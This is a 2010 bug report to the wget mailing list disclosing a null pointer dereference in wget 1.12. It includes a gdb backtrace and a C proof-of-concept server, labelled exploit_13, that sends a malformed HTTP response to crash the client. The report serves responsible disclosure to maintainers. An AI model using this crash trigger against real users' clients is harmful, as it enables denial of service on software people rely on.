[Bug-wget] wget bug report
From: |
Ildar Isaev |
Subject: |
[Bug-wget] wget bug report |
Date: |
Fri, 14 May 2010 22:48:29 +0400 |
User-agent: |
Thunderbird 2.0.0.21 (X11/20090409) |
Hi, I downloaded wget-1.12 from ftp://ftp.gnu.org/gnu/wget/wget-1.12.tar.bz2
It turns out it has a null pointer dereference bug. This is how it may
be reproduced.
Expl_for_wget.c (attached) is a small pseudo web server. Compile it and run:
address@hidden:$ gcc -Wall expl_for_wget.c -o expl_for_wget
address@hidden:$ ./expl_for_wget &
[1] 7330
address@hidden:$ gdb --args <path_to_wget_install_dir>/bin/wget
http://127.0.0.1:3500/
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) run
[Thread debugging using libthread_db enabled]
--2010-05-14 22:39:36-- http://127.0.0.1:3500/
Connecting to 127.0.0.1:3500... connected.
HTTP request sent, awaiting response... [New Thread 0x403a26c0 (LWP 7332)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x403a26c0 (LWP 7332)]
0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt
#0 0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
#1 0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
#2 0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
proxy=0x0, iri=0x8a27d40) at http.c:1832
#3 0x08066151 in http_loop (u=0x8a280e8, newloc=0xbffa8dec,
local_file=0xbffa8dd8, referer=0x0, dt=0xbffa8f24, proxy=0x0,
iri=0x8a27d40) at http.c:2581
#4 0x08072798 in retrieve_url (orig_parsed=0x8a280e8, origurl=0x8a27dd8
"http://127.0.0.1:3500/", file=0xbffa8f2c,
newloc=0xbffa8f28, refurl=0x0, dt=0xbffa8f24, recursive=false,
iri=0x8a27d40, register_status=true) at retr.c:692
#5 0x0806c46e in main (argc=2, argv=0xbffa9014) at main.c:1294
(gdb) up
#1 0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
117 return xmemdup (string, strlen (string) + 1);
(gdb)
#2 0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
proxy=0x0, iri=0x8a27d40) at http.c:1832
1832 hs->message = xstrdup (message);
(gdb) list
1827 resp = resp_new (head);
1828
1829 /* Check for status line. */
1830 message = NULL;
1831 statcode = resp_status (resp, &message);
1832 hs->message = xstrdup (message);
1833 if (!opt.server_response)
1834 logprintf (LOG_VERBOSE, "%2d %s\n", statcode,
1835 message ? quotearg_style (escape_quoting_style,
message) : "");
1836 else
(gdb) p message
$1 = 0x0
One can see that the null pointer dereference occurs at http.c:1832, because
'message' is NULL when it is passed to xstrdup().
Best regards,
Ildar
/* Server code in C */
//exploit_13
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
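/*
 * One-shot TCP server reproducing the wget-1.12 crash described above.
 *
 * It accepts a single connection on 127.0.0.1:3500, writes a 227-byte
 * response whose first line is "HTTP" followed by NUL bytes and a blank
 * line, and exits.  For such a response wget's resp_status() leaves
 * `message` NULL and gethttp() hands it to xstrdup(), which calls
 * strlen(NULL) (http.c:1832 in the backtrace).
 *
 * Returns EXIT_SUCCESS once the whole response has been written, or
 * EXIT_FAILURE if any socket call fails; the failing call is reported on
 * stderr.  Both sockets are closed on every exit path.
 */
int main(void)
{
    int rc = EXIT_FAILURE;
    int cfd = -1;

    int sfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sfd == -1) {
        perror("can not create socket");
        return EXIT_FAILURE;
    }

    struct sockaddr_in stSockAddr;
    memset(&stSockAddr, 0, sizeof stSockAddr);
    stSockAddr.sin_family = AF_INET;
    stSockAddr.sin_port = htons(3500);
    /* inet_pton() returns 1 on success; 0 (text not an address) does not
     * set errno, so report it without perror(). */
    if (inet_pton(AF_INET, "127.0.0.1", &stSockAddr.sin_addr) != 1) {
        fputs("error inet_pton failed\n", stderr);
        goto out_close_listener;
    }

    if (bind(sfd, (const struct sockaddr *)&stSockAddr, sizeof stSockAddr) == -1) {
        perror("error bind failed");
        goto out_close_listener;
    }

    if (listen(sfd, 10) == -1) {
        perror("error listen failed");
        goto out_close_listener;
    }

    /* The original did not check accept(); a failure here would have made
     * write() below act on fd -1 and exit with status 0. */
    cfd = accept(sfd, NULL, NULL);
    if (cfd == -1) {
        perror("error accept failed");
        goto out_close_listener;
    }

    /* Response bytes: "HTTP", twelve NULs, "\n\n", then NULs up to 227
     * bytes -- the same contents as the original hex initializer, built
     * with memset so the trailing zeros do not depend on a long literal. */
    char buf[227];
    memset(buf, 0, sizeof buf);
    memcpy(buf, "HTTP", 4);
    buf[16] = 0x0A;
    buf[17] = 0x0A;

    /* write() may fail or return a short count; either way the response
     * reaching wget is not the intended one, so treat both as failure. */
    ssize_t written = write(cfd, buf, sizeof buf);
    if (written != (ssize_t)sizeof buf) {
        if (written == -1) {
            perror("error write failed");
        } else {
            fprintf(stderr, "short write: %zd of %zu bytes\n", written, sizeof buf);
        }
        goto out_close_client;
    }

    rc = EXIT_SUCCESS;

out_close_client:
    close(cfd);
out_close_listener:
    close(sfd);
    return rc;
}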